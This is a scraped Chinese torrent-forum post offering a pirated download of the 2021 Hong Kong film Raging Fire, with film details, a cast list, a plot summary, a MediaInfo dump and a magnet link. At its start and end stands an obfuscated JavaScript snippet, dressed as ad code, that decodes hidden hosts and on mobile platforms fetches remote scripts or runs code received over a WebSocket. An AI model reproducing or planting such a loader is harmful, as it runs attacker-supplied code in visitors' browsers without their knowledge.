怒火·重案[国语配音].Raging.Fire.1080p.AMZN.WEB-DL.DDP5.1.H.264 6.79GB

版主小s 1月前 332

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 怒火·重案 / 怒火重案 / 怒火战 / 火拼 / Crossfire / Raging Fire

◎片 名 怒火

◎年 代 2021

◎产 地 中国香港 / 中国大陆

◎类 别 动作 / 犯罪

◎语 言 粤语 / 汉语普通话

◎上映日期 2021-07-30(中国大陆) / 2021-08-19(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt8165192/

◎豆瓣评分 7.3/10 (320196人评价)

◎豆瓣链接 https://movie.douban.com/subject/30174085/

◎片 长 128分钟

◎导 演 陈木胜 Benny Chan (id:1274293)

◎编 剧 陈木胜 Benny Chan (id:1274293)

凌伟骏 Ryan Wai-Chun Ling (id:1433091)

唐耀良 Yiu-leung Tong (id:1364033)

◎演 员 甄子丹 Donnie Yen (id:1025194)

谢霆锋 Nicholas Tse (id:1050053)

秦岚 Lan Qin (id:1274294)

谭耀文 Patrick Tam (id:1033280)

黄德斌 Tak-bun Wong (id:1274442)

吴浩康 Deep Ng (id:1313361)

何珮瑜 Jeana Ho (id:1316213)

杨天宇 Angus Yeung (id:1387692)

汤君慈 Bruce Tong (id:1339998)

麦亨利 Henry Mai (id:1377803)

喻亢 Kang Yu (id:1339113)

张文杰 Man Kit Cheung (id:1336383)

胡子彤 Tony Tsz-Tung Wu (id:1362877)

吕良伟 Ray Lui (id:1037706)

任达华 Simon Yam (id:1031194)

袁富华 Fu-wah Yuen (id:1359508)

林国斌 Ben Lam (id:1289293)

卢惠光 Ken Lo (id:1032633)

陈家乐 Carlos Chan (id:1275972)

张国强 Kwok Keung Cheung (id:1274568)

汤怡 Kathy Tong (id:1314475)

高战 Chris Collins (id:1379355)

辛格·哈提汗·比托 Singh Hartihan Bitto (id:1333958)

克里斯·柯林斯 K.C. Collins (id:1338050)

郭政鸿 Jing-hung Kwok (id:1044122)

麦长青 Cheung-Ching Mak (id:1274580)

陈木胜 Benny Chan (id:1274293)

甄子丹 Donnie Yen (id:1025194)

邵剑秋 Kim-Chau Shiu (id:1413263)

陈一奇 Yiqi Chen (id:1446359)

程武 Wu Cheng (id:1406349)

杨受成 Albert Yeung (id:1313455)

高莉 Anna Gao (id:1432407)

郑志昊 Zhihao Zheng (id:1397531)

李绮雯 Yee-Man Lee (id:1353241)

杨雪雯 (id:1450635)

区椲麟 (id:1450636)

梁琳 Lin Liang (id:1400716)

黎子良 Bernard Lai (id:1438022)

林明杰 Eric Lin (id:1374637)

张博 (id:1450637)

张康达 Hong Tat Cheung (id:1395690)

谢炀 (id:1450638)

◎标 签 警匪 / 中国香港 / 动作 / 犯罪 / 枪战 / 2021 / 悬疑 / 中国大陆

◎简 介

重案组布网围剿国际毒枭,突然杀出一组蒙面悍匪“黑吃黑”,更冷血屠杀众警察。重案组督察张崇邦(甄子丹 饰)亲睹战友被杀,深入追查发现,悍匪首领竟是昔日战友邱刚敖(谢霆锋 饰)。原来敖也曾是警队明日之星,而将敖推向罪恶深渊的人,却正是邦。宿命令二人再次纠缠,一切恩怨张崇邦如何作出了断……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 255599985642277193336344302587333954753 (0xC04AC440C59BED78250F38DCD429CCC1)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.79 GiB

  8. Duration : 2 h 6 min

  9. Overall bit rate : 7 711 kb/s

  10. Encoded date : UTC 2021-10-22 06:57:23

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 2 h 6 min

  23. Bit rate mode : Constant

  24. Bit rate : 7 069 kb/s

  25. Nominal bit rate : 10 000 kb/s

  26. Width : 1 920 pixels

  27. Height : 800 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.192

  36. Stream size : 6.23 GiB (92%)

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.709

  41. Transfer characteristics : BT.709

  42. Matrix coefficients : BT.709


  43. Audio

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 2 h 6 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 577 MiB (8%)

  58. Title : Chinese

  59. Language : Chinese

  60. Service kind : Complete Main

  61. Default : No

  62. Forced : No


  63. Text

  64. ID : 3

  65. Format : UTF-8

  66. Codec ID : S_TEXT/UTF8

  67. Codec ID/Info : UTF-8 Plain Text

  68. Duration : 1 h 56 min

  69. Bit rate : 42 b/s

  70. Count of elements : 1383

  71. Stream size : 36.5 KiB (0%)

  72. Title : English

  73. Language : English

  74. Default : No

  75. Forced : No




复制代码


TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:2DCD02B0F6020DCC6B4AA89079ADE32F9A4CC61F

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};